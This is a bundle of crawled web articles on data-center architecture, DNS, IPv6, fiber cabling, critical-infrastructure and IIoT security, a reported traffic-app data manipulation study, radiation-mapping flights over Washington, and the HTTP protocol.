s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501169776.21/warc/CC-MAIN-20170219104609-00400-ip-10-171-10-108.ec2.internal.warc.gz
en
0.947838
851
2.921875
3
Virtualized Data Center Early designs of cloud computing focused on blades with an independent Storage Area Network (SAN) architecture. This blueprint consolidated the CPU and memory into dense blade server configurations connected via several high-speed networks (typically a combination of Fibre Channel and 10GB) to large Storage Area Networks. This has been a typical blueprint delivered by traditional off the shelf pre-built virtualization infrastructure, especially in the enterprise in private cloud configurations. More recently, hardware vendors have been shipping modular commodity hardware in dense configurations known as Hyperscale computing. The most noticeable difference is the availability of hard drives, or solid state drives (SSDs), within the modules. This gives the virtualization server and the VMs access to very fast persistent storage and eliminates the need for an expensive SAN to provide storage in the cloud. The hyperscale model not only dramatically changes the Price / Performance model of cloud computing but, because it is modular, it also allows you to build redundancies into the configuration for an assumed failure architecture. For the mCloud solution, this architecture also provides the implementation team more flexibility by affording a “Lego block” like model of combining compute nodes and storage nodes into optimal units within a VLAN grouping of a deployment. This allows for the management of a large resource pool of compute and storage into an individually controlled subset of the data center infrastructure. A hyperscale architecture is a synergistic infrastructure for SOA. It too uses the idea of simple, commodity functions. Hyperscale architectures have removed expensive system management components and, instead, focus on what matters to the cloud, which is compute power and high density storage. Simple architectures are easy to scale. In other words, an architecture that contains system management and other resiliency features in order to achieve high availability will be more difficult to scale, due to complexity, than an architecture with simpler commodity components that offloads failover to the application. The hyperscale model makes it easy and cost effective to create a dynamic infrastructure because of low-cost, easily replaceable components, which can be located either in your data center or in remote places. The components are easy to acquire and replace. In contrast, an architecture that puts the responsibility for HA in the infrastructure, is much more complex and harder to scale. Using this approach, in a massively scalable system, it’s been reported that IT operators wait for many disks (even up to 100) to fail before scheduling a mass replacement, thereby making maintenance more predictable as well. Enterprises require application availability, performance, scale, and a good price. If you’re trying to remain competitive today, your philosophy must assume that application availability is the primary concern for your business. And you will need the underlying infrastructure that allows your well-architected applications to be highly available, scalable, and performant. Businesses and their developers are realizing that in order to take advantage of cloud, their applications need to be based on a Service Oriented Architecture (SOA). SOA facilitates scalability and high availability (HA) because the services which comprise an SOA application can be easily deployed across the cloud. 
Each service performs a specific function, provides a standard and well-understood interface and, therefore, is easily replicated and deployed. If a service fails, there is typically an identical service that can transparently support the user request (e.g., clustered web servers). If any of these services fail, they can be easily restarted, either locally or remotely (in the event of a disaster). Well-written applications can take advantage of the innovative, streamlined, high-performing, and scalable architecture of hyperscale clouds. Hosted Private Clouds built on hyperscale hardware and leveraging open source aim to provide a converged architecture (software services to hardware components) in which everything is easy to troubleshoot and is easily replaceable with minimum disruption. With the micro-datacenter design, failure of the hardware is decoupled from the failure of the application. If your application is designed to take advantage of the geographically dispersed architecture, your users will not be aware of hardware failures because the application is still running elsewhere. Similarly, if your application requires more resources, Dynamic Resource Scaling allows your application to burst transparently from the user’s perspective. By abstracting the function of computation from the physical platform on which computations run, virtual machines (VMs) provided incredible flexibility for raw information processing. Close on the heels of compute virtualization came storage virtualization, which provided similar levels of flexibility. Dynamic Resource Scaling technology, amplified by Carrier Ethernet Exchanges, provides high levels of location transparency, high availability, security, and reliability. In fact, by leveraging Hosted Private Clouds with DRS, an entire data center can be incrementally defined by software and temporarily deployed. One could say a hosted private cloud combined with dynamic resource scaling creates a secure and dynamic “burst-able data center.” Applications with high security and integration constraints, and which IT organizations previously found difficult to deploy in burst-able environments, are now candidates for deployment in on-demand scalable environments made possible by DRS. By using DRS, enterprises have the ability to scale the key components of the data center (compute, storage, and networking) in a public cloud-like manner (on-demand, OpEx model), yet retain the benefits of private cloud control (security, ease of integration). Furthermore, in addition to the elasticity, privacy, and cost savings, hyperscale architecture affords enterprises new possibilities for disaster mitigation and business continuity. Having multiple, geographically dispersed nodes gives you the ability to fail over across regions. The end result is a quantum leap in business agility and competitiveness. By Winston Damarillo, CEO and Co-founder of Morphlabs. Winston is a proven serial entrepreneur with a track record of building successful technology start-ups. Prior to his entrepreneurial endeavors, Winston was among the highest-performing venture capital professionals at Intel, having led the majority of his investments to either a successful IPO or a profitable corporate acquisition. In addition to leading Morphlabs, Winston is also involved in several organizations that are focused on combining the expertise of a broad range of thought leaders with advanced technology to drive global innovation and growth.
<urn:uuid:58d650ce-8223-46c4-9a7c-794e014fbd63>
CC-MAIN-2017-09
https://cloudtweaks.com/2012/03/leveraging-a-virtualized-data-center-to-improve-business-agility-conclusion/
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501170864.16/warc/CC-MAIN-20170219104610-00100-ip-10-171-10-108.ec2.internal.warc.gz
en
0.928587
1,283
2.75
3
Question 1) Test Yourself on CompTIA i-Net+. Objective: Network. SubObjective: Understand and be able to Describe the Use of Internet Domain Names and DNS. Single Answer, Multiple Choice. DNS uses a lookup table to resolve names. Which record type in the DNS table is used for the assignment of multiple, fully qualified domain names to one IP address? An IP address can be assigned to more than one fully qualified domain name. The DNS lookup table must contain the multiple names for the IP address. The record in the DNS table that denotes an IP address assigned multiple, fully qualified domain names is CNAME, which stands for canonical name. An example of a CNAME record is sketched in the code block below. A is an address record. The A record is used to directly map the record’s host name to its IP address. MX is a mail exchange record. The MX record is used to identify the mail exchanger for a host. PTR is a pointer record. The PTR record is used to directly map the record’s IP address to its hostname. These questions are derived from the Self Test Software Practice Test for CompTIA Exam #IK0-002: i-Net+.
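Below is a hedged sketch of how the record types discussed here fit together. The zone-file entries in the comments are hypothetical, and the lookup uses Python's standard socket module; the exact output depends on the real DNS data for whatever name you query.

```python
import socket

# Hypothetical zone-file entries illustrating the record types discussed:
#   www.example.com.          IN CNAME  example.com.        ; extra name -> canonical name
#   example.com.              IN A      192.0.2.10          ; canonical name -> IP address
#   example.com.              IN MX     10 mail.example.com.
#   10.2.0.192.in-addr.arpa.  IN PTR    example.com.        ; IP address -> name

# Resolving an alias follows the CNAME chain back to the canonical name,
# so several fully qualified names can end up at the same address record.
canonical, aliases, addresses = socket.gethostbyname_ex("www.example.com")
print("canonical name:", canonical)
print("aliases (CNAMEs):", aliases)
print("addresses:", addresses)
```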
<urn:uuid:52a6f94c-d57e-4171-a726-9be02b50d1e8>
CC-MAIN-2017-09
http://certmag.com/question-1-test-yourself-on-comptia-i-net/
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501173405.40/warc/CC-MAIN-20170219104613-00328-ip-10-171-10-108.ec2.internal.warc.gz
en
0.869902
251
3.671875
4
Apple [AAPL] already provides support for IPv6, the latest iteration of the IP addressing system that launches today, World IPv6 day. While the significance of this may not impact you just yet, I've put together a general guide to IPv6, the reasons to support it, and Apple's support. [ABOVE: Now available at Apple's retail outlets, the Nest Learning Thermostat is an example of the kind of connected devices which will drive future IPv6 adoption.] What is IPv6? In very simple terms, the Internet relies on IP addresses to find every computer, server, smartphone and iPad on the vast network (there are alternative methods, such as NAT addressing). Until now we've been using a standard called IPv4, which is not directly compatible with IPv6 and must be run concurrently. However, the IPv4 standard is only capable of offering up 4.3 billion unique IP addresses, and while that sounds like an awful lot, it isn't as we're expecting over 50 billion connected devices will be in use by 2020. IPv6 is the solution. It promises 340 undecillion (3,400 followed by 35 zeros) IP addresses. That's hopefully going to be enough to serve the Internet to mobile devices, Macs, PCs, and the coming wave of M2M and connected home devices (above). There's an excellent infographic explaining the need to move to IPv6 right here. IPv6 was originally expected to run in parallel with IPv4, with transition expected to begin immediately. This didn't happen as ISPs and online enterprises resisted the migration, they didn't need the expense. One problem with IPv6 is its backward incompatibility with the preceding standard -- you need to "tunnel" traffic via IPv4 networks, among other ways to run both concurrently. To tunnel means an: "IPv6 packet is put inside an IPv4 packet so it can be forwarded by existing IPv4 routers until it reaches an IPv6-capable router again." Business has lacked a clear case for adoption of the standard. The case is emerging now as the explosion in mobile and connected devices, particularly in emerging markets has seen many players in those markets opt for IPv6. As an example, an online retail store based on IPv4 will not be accessible to users on IPv6 networks until it (and its ISP) deploy support for this. Many enterprise providers are now working toward IPv6 support today in order to invest in the expertise they require to manage tomorrow's full transition. Apple and IPv6 Starting with Jaguar, Mac OS X supports IPv6 out of the box. In 2008, Google data confirmed Apple users to be ten times more likely to be IPv6-capable than Windows and Linux users. Apple also offers some support resources. For example, you can test your IPv6 connectivity by visiting this webpage. If you find sites you regularly visit cease to function correctly in the next few days, Apple notes some helpful suggestions for resolving IPv6 connectivity problems, symptoms of which might include: - The web browser is unresponsive after you enter a search in the search field - The web browser reports that it is unable to connect to server because it isn't responding - The web browser connects, but only after several minutes - The web browser connects, but downloads take much longer than normal, or never complete - Other Internet-enabled activities such as reading mail or posting photos do not complete, possibly only when using certain sites Be aware: today is IPv6 day, when Google, YouTube, Yahoo, Akamai, Facebook and over 2,500 websites are switching on their IPv6 provision. 
This means many smaller websites and search engines are also experimenting with support for the standard, so those problems listed above may appear in the next few days on a service or site you regularly use. So here's Apple's troubleshooting link again. "While it is expected that fewer than 1 out of every 20,000 people will be affected on June 8, 2011, some customers may experience difficulties such as performing searches or connecting to popular websites, such as Google, Yahoo!, YouTube, and Facebook," Apple informs. "World IPv6 Launch Day is a lot larger than people understand," says president and CEO of the American Registry for Internet Numbers (ARIN), John Curran. "It's not a small decision for the major content providers to turn on IPv6 and leave it on. From now on, everything they roll out will be on IPv4 and IPv6." AirPort and IPv6 "One key advantage of IPv6 is that it configures itself automatically. In most cases, your computer and applications will detect and take advantage of IPv6-enabled networks and services without requiring any action on your part," Apple tells us, while also offering instructions with which to manually enable or disable support for it. For the most part, Apple's applications (Safari for example) also support IPv6, but there's a few flaws in this (see here). Apple's AirPort Base Stations already support IPv6, though the company removed specific management tools from its AirPort Utility software within the most recent release, which generated much hue and cry. It isn't known yet how the company intends updating the software for the management features you need for the standard. "Apple has taken the ability to seamlessly support IPv6 away from the AirPort Utility.. It's a little concerning. We hoped to see more IPv6 support, not less, among [customer premises equipment] vendors," responded Comcast's Chief Architect for IPv6, John Brzozowski. However, given that OS x and iOS both now support IPv6, it's clear the company recognizes the importance of such support. The growing awareness of IPv6 is articulated within the most recent Arbor 'Worldwide Infrastructure Security Report': "Nearly 42 percent of respondents project that their IPv6 traffic volume will increase 20 percent over the next 12 months, almost 18 percent forecast greater than a 100 percent IPv6 volume increase across the same period." So, is it all IPv6 everywhere? Short answer: No. Today's move by some of the biggest Internet firms to enable support for the standard is significant, but most analysts expect full migration to take until 2020. Meanwhile you'll see an Internet based on both IPv4 and IPv6. Most major ISPs are moving to adopt it, as are equipment suppliers, but as with any transition you can expect the unexpected -- there will be problems. Must we make the move? Yes. Connected devices sales are exploding. These don't just include your iPads, iPhones and smartphones, these also include IP-enabled cars (smart cities aren't too far away), the fast-growing markets in mHealth devices, home intelligence and industrial control systems and more. As an example, it's thought that 92 million cars will be connected to the Internet by 2016 while 825 million electricity meters will also be connected. Yes, there are alternatives to IP address provision for some of these devices, but these numbers are huge -- 4.3 billion addresses just aren't enough. 
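A quick way to check the address-space arithmetic quoted above is Python's standard ipaddress module; the prose figures are rounded, while these are the exact powers of two.

```python
import ipaddress

ipv4_total = ipaddress.ip_network("0.0.0.0/0").num_addresses   # 2**32
ipv6_total = ipaddress.ip_network("::/0").num_addresses        # 2**128

print(f"IPv4 addresses: {ipv4_total:,}")                 # about 4.3 billion
print(f"IPv6 addresses: {ipv6_total:,}")                 # about 3.4 x 10**38
print(f"IPv6 / IPv4 ratio: {ipv6_total // ipv4_total:,}")
```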
In 2011, 53 percent of the 201 million IP addresses allocated by the provision authorities went to companies in the Asia-Pacific region, where IPv6 provision is far advanced. These booming markets will quickly catch up in terms of smartphone use and mobile device allocation, and will forge ahead with new notions of the connected age. Apple's leading position in the mobile device industry hasn't yet translated into the firm taking an active position on IPv6 Day, but its operating systems' long-standing support for the addressing scheme confirms the company is ready to embrace the transition.

What should it mean to you as an everyday user? As little as possible: all parties investing in IPv6 support are attempting to implement it with as little inconvenience to customers as possible. However, if you are using older equipment it is worth checking whether your devices can support the protocol, as you'll likely find elements of your Internet experience changing in the coming months.

Got a story? Drop me a line via Twitter or in comments below and let me know. I'd like it if you chose to follow me on Twitter so I can let you know when these items are published here first on Computerworld.
Fiber optic cables form one of the most important parts of the networking industry today. Fiber cables are composed of one or more transparent optical fibers enclosed in a protective covering and strength members, and are used to transmit data in the form of light. The various types of fiber cables available include multimode duplex fiber cables, single-mode simplex fiber cables, single-mode duplex fiber cables, armored fiber cables and plastic optical fiber cables.

What is Armored Fiber Cable

An armored fiber cable is an optical fiber cable wrapped in an additional protective layer of "armor"; it is mainly used to meet customer requirements such as rodent resistance and moisture protection. The term comes from armored electrical cable, a power cable made up of two or more electrical conductors, generally held together by an overall sheath. That electrical cable, with its heavy protective covering, is used for the transmission of electrical power, especially for underground wiring, though such cables may also be installed as permanent wiring within buildings, buried in the ground, run overhead, or even left exposed. They are available as single-conductor as well as multi-conductor cables.

Common Armored Fiber Cable

Armored fiber optic cables are often installed in a network for added mechanical protection, as they have extra reinforcing in the cable housing to prevent damage. Two types of armored fiber optic cables exist: interlocking and corrugated. Interlocking armor is an aluminum armor that is helically wrapped around the cable and found in indoor and indoor/outdoor cables; it offers ruggedness and superior crush resistance. Corrugated armor is a coated steel tape folded around the cable longitudinally; it is found in outdoor cables and offers extra mechanical and rodent protection.

Armored Flame Retardant Fiber Optic Cable for Indoor/Outdoor Applications

Indoor/outdoor fiber optic cables have become popular over the last several years, and there are good reasons for this. For service providers, indoor/outdoor fiber cables present big time and cost savings. This cable design can come from the outdoor environment and enter a building without the need to switch cable designs to achieve the flame retardance required indoors. Such a dual-purpose cable can reduce the cost of terminations and the related labor of changing cable designs. The development of dry water-blocking core technology has also helped indoor/outdoor fiber cable development; this dry core technology uses water-swellable materials to block the flow of moisture in the longitudinal direction.

We also provide other types of fiber optic cable, such as waterproof cable. Waterproof fiber pigtail cable can be used in harsh environments and is mainly used for outdoor connection of the optical transmitter. A waterproof fiber pigtail is designed with a stainless-steel-strengthened waterproof unit and armored, outdoor PE-jacketed cables.

Note: If you want more detailed specifications for armored fiber cable, you can visit the armored fiber cable product pages at FiberStore. Every fiber optic cable has different specifications, and if you have questions about them, please contact us.
“Critical infrastructure consists of physical and information technology assets, such as the electricity distribution networks, telecommunications networks, banking systems, manufacturing and transportation systems, as well as government information systems and services that support the continued and effective functioning of government. Elements of critical infrastructure can be stand-alone or interconnected and interdependent within and across provinces, territories, and international borders. Most of Canada’s critical infrastructure is owned by the private sector or by municipal, provincial, or territorial governments, and much of it is connected to other systems. Cyber threats to Canada’s critical infrastructure refer to the risk of an electronic attack through the Internet. Such attacks can result in the unauthorized use, interruption, or destruction of electronic information or of the electronic and physical infrastructure used to process, communicate, or store that information. Our audit examined whether selected federal departments and agencies are working with the provinces and territories and the private sector to protect Canada’s critical infrastructure against cyber threats. This included examining leadership roles and responsibilities for securing key government information systems.”
Level of Gvt: State

Problem/situation: While access to the Internet can provide important government information to residents of a state, most services are costly.

Solution: Maryland introduced Sailor, a program that allows Maryland residents to visit the Internet through the state library for free.

By David Noack

While state and local governments across the country continue to place information on the Internet, Maryland has become the first state to offer its residents free access to the global collection of networks. The ambitious project, called Sailor, provides residents with the opportunity to tap into global, state and local libraries and databases brimming with information, news and research materials. Additional services, such as e-mail and file transfer, cost about $35 per year.

The system, developed by the Maryland Department of Education's Division of Library Development and Services, also offers access to more than a dozen libraries and research databases, community news, and state and local government information. Users can locate churches or child care centers in their area, find out if the book they're looking for is available, and learn more about the Maryland Legislature or a particular state agency.

MARYLAND GENERAL ASSEMBLY

Residents - or anybody else with an interest in state government - can get historical, biographical and legislative information about the Maryland General Assembly using Sailor. There are also biographies of state senators and members of the House of Delegates, and information on a number of state agencies such as the Governor's Office, the Public Broadcasting Commission and the State Lottery Agency.

Sailor debuted last summer. The project was partially funded by a $2 million federal grant, and officials are seeking ongoing state funding to maintain and improve the system. When Sailor is complete, it will be capable of handling 600 dial-in telephone lines and modems.

While library systems across the country are beginning to provide Internet access on a localized basis, Maryland offers statewide access for the cost of a local telephone call. Officials hope to have local phone access provided for the state's 3.5 million residents in 24 counties by this summer. Examples of other libraries providing free or low-cost Internet access include the Morris County Public Library System in New Jersey, which last year inaugurated an Internet project called MORENET; earlier this year, the Baltimore County Public Library began offering full-service dial-up Internet accounts for a small fee, including e-mail, Telnet, File Transfer Protocol and access to the World Wide Web via a text-based browser called Lynx.

Because Sailor is overseen by the state Department of Education, many of its resources are geared toward education. "We are looking at how to get state budget and legislation action online," said Maurice Travillian, assistant superintendent of the state Department of Education.

Barbara G. Smith, Sailor project manager, said the system was designed with the public in mind. "Sailor enables Marylanders of all ages to begin to use the Internet. It is widely used in schools and many people dial in from their home or office. Numerous colleges and universities make it available through campuswide information systems," said Smith.

Sailor grew out of a librarian networking project started in 1992 called Seymour, which was a response to a request from the State Library Networking Coordinating Council.
In early 1993, the Computer Science Center at the University of Maryland at College Park (UMCP) suggested that a Gopher server be used to create a publicly accessible Internet system, replacing Seymour. Smith said that even though the name of the project has changed, the goals and mission statement - rapid, easy access to information - remain the same. "We learned a lot from the original Gopher at UMCP and that knowledge became the foundation for the current Gopher," she said. "We really like Gopher as a way to get this service started. It's friendly, most computers will work with it, our 56Kbps network will support it, and we can load a variety of files we've begun to collect at the state and local level."

THE LIBRARY TREND

The continuing movement among libraries to offer Internet access is far removed from the original mission of the global computer "network of networks." The Internet started in 1969 as a defense and research networking tool to be used in case of nuclear war. The decentralization of the network - with no central access point or command center - made it difficult for a warhead to disable the entire network. Over the last 25 years, however, the Internet has evolved from its defense and research roots to the point where it is now used by an estimated 30 million people in a variety of ways, from e-mail and transferring files to accessing databases. What's attracting many new users, who usually gain access through commercial or fee-based Internet Service Providers (ISPs), is the vast amount of information and resources available. While Sailor provides Maryland residents with a free peek into the Internet's window of resources, some features common to commercial ISPs are unavailable unless an account is established.

Travillian of the Department of Education said a main reason statewide Internet access was provided is to keep pace with the way information is rapidly being adapted to electronic platforms. "The information used to be in books or in magazines and newspapers and the library collected them. It's now digitized," Travillian said. "The supply of our information is coming in a different form, [so] the library has to provide it in a different way."

One of the most popular features of the system is an employment database, which provides information on local, state, federal and private sector job opportunities. And as state and local government information is added to the system, localities view it as a way to promote their county or town to spur tourism and economic development. "Some local governments are jumping on this," Travillian said. "Some counties have been eager to bring their information [online] and see it partly as a tourist thing that will help bring people in and also as an economic development tool."

Sailor project manager Smith said one of the advantages of providing access to the information superhighway is that people not accustomed to it are "amazed" by its capabilities. "Librarians have been organizing access to information for centuries, and now we are bringing those same skills to the Internet," she said. "At the same time, we are opening access for people who might not have the opportunity. We are leveling the playing field."
Energy plants and factories have always been prime targets for delivering a devastating setback and psychological blow against an enemy. Today, attacks against critical infrastructure can be just as disruptive when launched in cyberspace. The threat of cyber-attacks against the Industrial Internet of Things (IIoT) is very real. For instance, a cyber-attack on a Ukrainian power station in 2015 caused a loss of power affecting 225,000 customers. Cyber-attacks against critical network infrastructure can have severe consequences, and this has put world governments on high alert.

Threat to IIoT

In the U.S., the Department of Homeland Security (DHS) has raised concerns over the growing number of cyber-attacks on industrial control networks. In fact, the DHS takes the situation so seriously that it recently published guidelines to "provide a strategic focus on security and enhance the trust framework that underpins the IoT ecosystem." The document is the first attempt to provide clear cybersecurity guidance to organizations implementing IIoT and calls for a combined approach. Among the measures discussed are "considered connectivity" and "defense in depth."

Failing to Measure Up

The Federal Trade Commission (FTC) has named and shamed numerous companies whose data privacy and security procedures have fallen short of good practice. One example is a company called Lifelock, which failed to ensure employees had adequate security on computers they were using to access the network remotely. The FTC also made an example of Premier Capital Lending, which, the FTC says, provided a remote login account so that one of its clients could access consumer reports. Unfortunately, it did this without auditing the client's security, which allowed hackers to steal online passwords and consumer personal information. Failure to properly secure third-party access also featured in the Dave & Buster's case. On that occasion, the third party had been granted more access than it needed: the absence of restrictions limiting connections to specified IP addresses or imposing time limits was said to have allowed an intruder to connect to the network, causing a leak of personal information (a minimal sketch of such restrictions appears at the end of this article).

The question of whether to put similar limits on industrial IoT connections lies at the heart of what the DHS means by "considered connectivity." It is not unusual for an IIoT component in a networked environment to fail or suffer some kind of service disruption. The DHS guide asks organizations to consider very carefully and deliberately the risks following a possible breach or device failure compared with the costs of limiting Internet connectivity. For instance, continuous network access may be convenient, but is it strictly necessary in the context of what the device does? A nuclear reactor having a continuous connection to the Internet carries too great a risk, because it also opens the door to a network intrusion.

Defense in Depth

IIoT organizations are advised to adopt a defense-in-depth approach to help them stay ahead of privacy and security risks. Defense in depth comprises three steps:

- Understand exactly what the device does – Without a full appreciation of the function and scope of each individual device, organizations run the risk of activating direct connections to the Internet when they are not strictly needed.
- Make a conscious decision about every IIoT connection – Sometimes connecting to a local network, so that the content of critical information can be analyzed before it is sent, is sufficient.
Industrial Control Systems (ICS) are complex and critical, and it is essential to protect them using defense-in-depth principles.

- Build in remote management capability – Manufacturers, critical network infrastructures and service providers must be able to disable network connections or specific ports remotely when needed.

Remote Connectivity Needs Managed VPNs

Despite their vital contribution, IIoT systems often have to be installed in some of the remotest and most inaccessible places imaginable. They are also highly attractive to cybercriminals, who regard them as the most vulnerable point in the network. Protection of remote connections on IIoT systems is best managed with Virtual Private Network (VPN) software. VPNs form a secure connection at the remote IIoT gateway, integrating seamlessly with existing infrastructure and encrypting all data traffic passing to and from individual devices. To achieve defense in depth, NCP engineering recommends that IIoT organizations give careful consideration to on-demand/always-on access along with command-line or API control. Additionally, authentication in the form of software/hardware network certification and central management for remotely configuring devices are advisable.

In summary, the stance taken by regulators on the subject of IIoT or machine-to-machine (M2M) security has focused on organizations taking adequate precautions to manage and protect data privacy. By following some basic ground rules and securing every necessary remote connection with VPN management, it should be possible for companies to stay ahead of cybersecurity threats. For good measure, it is advisable to keep things under constant review and give IT operatives clear instructions to follow for in-depth privacy and security practices.
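The FTC cases and the DHS "considered connectivity" guidance above both come down to restricting who may open a remote connection and when. The sketch below is a generic illustration of that idea in Python: an IP allowlist plus an agreed maintenance window checked before a remote session is accepted. The subnet, time window and function names are assumptions made for the example, not part of any DHS guideline or NCP product.

```python
from datetime import datetime, time
from ipaddress import ip_address, ip_network

# Illustrative policy: only the vendor's maintenance subnet may connect,
# and only during a pre-agreed service window.
ALLOWED_NETWORKS = [ip_network("203.0.113.0/28")]   # example subnet (TEST-NET-3)
SERVICE_WINDOW = (time(1, 0), time(4, 0))            # 01:00-04:00 local time

def connection_permitted(remote_ip, now=None):
    """Return True only if the source address and time of day satisfy the policy."""
    now = now or datetime.now()
    addr = ip_address(remote_ip)
    in_allowlist = any(addr in net for net in ALLOWED_NETWORKS)
    start, end = SERVICE_WINDOW
    in_window = start <= now.time() <= end
    return in_allowlist and in_window

if __name__ == "__main__":
    print(connection_permitted("203.0.113.5", datetime(2017, 2, 16, 2, 30)))   # True
    print(connection_permitted("198.51.100.7", datetime(2017, 2, 16, 2, 30)))  # False: wrong subnet
    print(connection_permitted("203.0.113.5", datetime(2017, 2, 16, 14, 0)))   # False: outside window
```

In a real deployment a check like this would sit in front of the VPN and gateway authentication described above, not replace them.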
Hackers can influence real-time traffic-flow-analysis systems to make people drive into traffic jams or to keep roads clear in areas where a lot of people use Google or Waze navigation systems, a German researcher demonstrated at BlackHat Europe.

Google and Waze both offer turn-by-turn navigation in smartphone apps and use information derived from those phones for real-time traffic analysis. However, because of the tradeoff between user privacy and data gathering, hackers can anonymously influence navigation software to trick the real-time traffic system into registering something that isn't there, said Tobias Jeske, a doctoral student at the Institute for Security in Distributed Applications of the Hamburg University of Technology, during the security conference in Amsterdam. "You don't need special equipment for this and you can manipulate traffic data worldwide," Jeske said.

Both Google and Waze use GPS as well as Wi-Fi in phones to track locations. If Wi-Fi alone is enabled, only information about wireless access points and radio cells in the surrounding area will be transferred, which lets the navigation systems approximate the location of the user, Jeske said.

Google navigation uses real-time traffic information in Google Maps for mobile. The protocol used to send location information is protected by a TLS (Transport Layer Security) tunnel that ensures data integrity, so that it is impossible for an attacker to monitor another user's phone or modify information without being detected by Google, said Jeske. However, TLS is useless if the attacker controls the beginning of the TLS tunnel, he added. To gain control of the beginning of the tunnel, Jeske performed a man-in-the-middle attack on an Android 4.0.4 phone to insert himself into the communication between the smartphone and Google. When the attacker controls the beginning of the tunnel, false information can be sent without being detected, and in this way attackers are able to influence the traffic-flow analysis, according to Jeske.

If, for example, an attacker drives a route and collects the data packets sent to Google, the hacker can replay them later with a modified cookie, platform key and time stamps, Jeske explained in his research paper. The attack can be intensified by sending several delayed transmissions with different cookies and platform keys, simulating multiple cars, Jeske added. An attacker does not have to drive a route to manipulate data, because Google also accepts data from phones without information from surrounding access points, thus enabling an attacker to influence traffic data worldwide, he added.

A similar attack scenario can be applied to Waze, but it is more difficult to affect the navigation of other drivers, Jeske said. Waze associates position data with user accounts, so an attacker who wants to simulate more vehicles needs different accounts with different email addresses, he added. Jeske also found a way to transfer position data to Waze without user authentication, rendering the attacker anonymous, he said, without elaborating on that method.

For an attacker to actually influence traffic, a substantial number of Waze or Google navigation users have to be in the same area. When it comes to Waze, that is probably not going to happen around Hamburg, for instance, he said. Waze, however, had 20 million users worldwide in July last year, so there should be areas where it is possible, he said.
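The countermeasure Jeske suggests later in the article -- tying each location report to a time-stamped, one-time authentication token -- can be pictured with a short sketch. This is a generic illustration of the idea with assumed key handling and a five-minute validity window; it is not how Google or Waze actually implement their reporting protocols.

```python
import hashlib
import hmac
import json
import time

SECRET_KEY = b"per-device-secret-issued-at-registration"  # assumed provisioning step
MAX_AGE_SECONDS = 300  # reports older than five minutes are rejected

def sign_report(report, key=SECRET_KEY):
    """Attach a timestamp and an HMAC so the server can spot forged or altered reports."""
    report = dict(report, timestamp=int(time.time()))
    payload = json.dumps(report, sort_keys=True).encode()
    report["mac"] = hmac.new(key, payload, hashlib.sha256).hexdigest()
    return report

def verify_report(report, key=SECRET_KEY):
    """Reject reports whose MAC does not match or whose timestamp is too old."""
    mac = report.get("mac", "")
    body = {k: v for k, v in report.items() if k != "mac"}
    payload = json.dumps(body, sort_keys=True).encode()
    expected = hmac.new(key, payload, hashlib.sha256).hexdigest()
    fresh = abs(time.time() - body.get("timestamp", 0)) <= MAX_AGE_SECONDS
    return hmac.compare_digest(mac, expected) and fresh

if __name__ == "__main__":
    signed = sign_report({"lat": 53.55, "lon": 9.99, "speed_kmh": 12})
    print(verify_report(signed))   # True: fresh and untampered
    signed["speed_kmh"] = 0        # tampering breaks the MAC
    print(verify_report(signed))   # False
```

A full design would also need server-side tracking of already-used tokens, so that an unmodified packet cannot simply be replayed within the validity window.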
Although Jeske hasn't tested the vulnerability of other services offering real-time traffic data, they work more or less the same way as Google and Waze, so he expects that similar attacks on those systems are possible, he said. Companies that offer navigation apps can avoid this sort of attack by linking location information to one-time authentication that is time stamped and limited to a fixed amount of time, Jeske said. That would restrict the maximum number of valid data packets per time and device, helping to secure the system, he added. Loek is Amsterdam Correspondent and covers online privacy, intellectual property, open-source and online payment issues for the IDG News Service. Follow him on Twitter at @loekessers or email tips and comments to firstname.lastname@example.org
Data collected by a helicopter flying daily over Washington, D.C., through next week could one day be key to detecting a nuclear or radiological weapon amid the clutter of harmless radioactive sources scattered through the city. The National Nuclear Security Administration began sending the rotorcraft loaded with radiation-detection equipment over the nation’s capital on Dec. 27 and the flights continue through Jan. 11. The missions ultimately will cover 70 square miles, encompassing the entirety of the District of Columbia and possibly areas of neighboring Northern Virginia. The agency is a semiautonomous arm of the Energy Department responsible for helping prevent, or respond to, any nuclear or radiological incidents. A DOE-owned Bell helicopter with two pilots, a scientist and technician is making two flights per day on average, depending on the weather, the official said. Roughly 20 flights are anticipated in total. The intent is to identify natural emitters of radiation that already exist locally in the event that authorities are forced to hunt for a nuclear weapon, radiological “dirty bomb,” or another radioactive source that is lost or stolen. “There’s natural radiation in the environment all around us. The pavement emits radiation, and especially in D.C. there’s a lot of granite statues,” an NNSA official told Global Security Newswire. “Granite has natural radium and thorium and other radioactive isotopes. And that emits radiation.” The individual spoke on condition of anonymity, lacking authorization to comment on the project. “If they find something, then we can compare it to this background map and say we know that that’s a hot spot because there’s a statue here or there’s this natural feature that happens to be more radioactive than the area around it,” added the official. “It saves time in adjudicating anomalies in directed operations.” The rotorcraft carries crystal-based technology for finding gamma radiation, which can spread hundreds of feet into the atmosphere. “It goes back and forth, kind of like mowing the lawn at 150 feet in the air,” the official said of the specially outfitted helicopter. Analysis of the findings by the NNSA Remote Sensing Laboratory at Joint Base Andrews in Maryland should be completed shortly after the flight program finishes, the source added. The project is being conducted at the request of local law enforcement, but the official did not know the specific agency. The Energy Department has conducted hundreds of aerial searches since the 1960s for environmental remediation projects and background radiation checks. Selected areas of Washington and surrounding jurisdictions in Virginia were previously scanned about five years ago by the nuclear agency. It has conducted corresponding flight operations in New York City, Baltimore and the Bay Area of California, usually at the request of the municipalities, the official said. The agency has also trained police in cities including Chicago to use their own systems for the same end. Digital maps highlighting natural radioactive hot spots are then produced by NNSA specialists. In all cases, maps of the findings are submitted to the covered jurisdictions, the agency said.
HTTP is a communication protocol: a complete system of rules, formats and conventions for the digital messages exchanged between computing systems. HTTP (Hypertext Transfer Protocol) was proposed in 1989 by Tim Berners-Lee, co-author of the HTTP 1.0 specification. This set of rules is the key to connecting to web servers, whether over the Internet or an intranet. The protocol operates on top of another protocol, TCP/IP. In the OSI (Open Systems Interconnection) model, HTTP resides at the uppermost layer, known as the application layer.

The two main functions of this protocol are:

- To provide a connection to web servers; after connecting to one, requested HTML pages are sent back to the user's web browser (the software application that retrieves and presents information).
- To allow a requested file to be downloaded from a destination server by a browser or other HTTP-based application.

A web browser, acting as an HTTP client, can send a request for a file to a web server, which stands ready to handle such requests using the HTTP service. Because this protocol is the default for web browsers, you can type either www.hotmail.com or http://www.hotmail.com; both are treated the same by the browser.

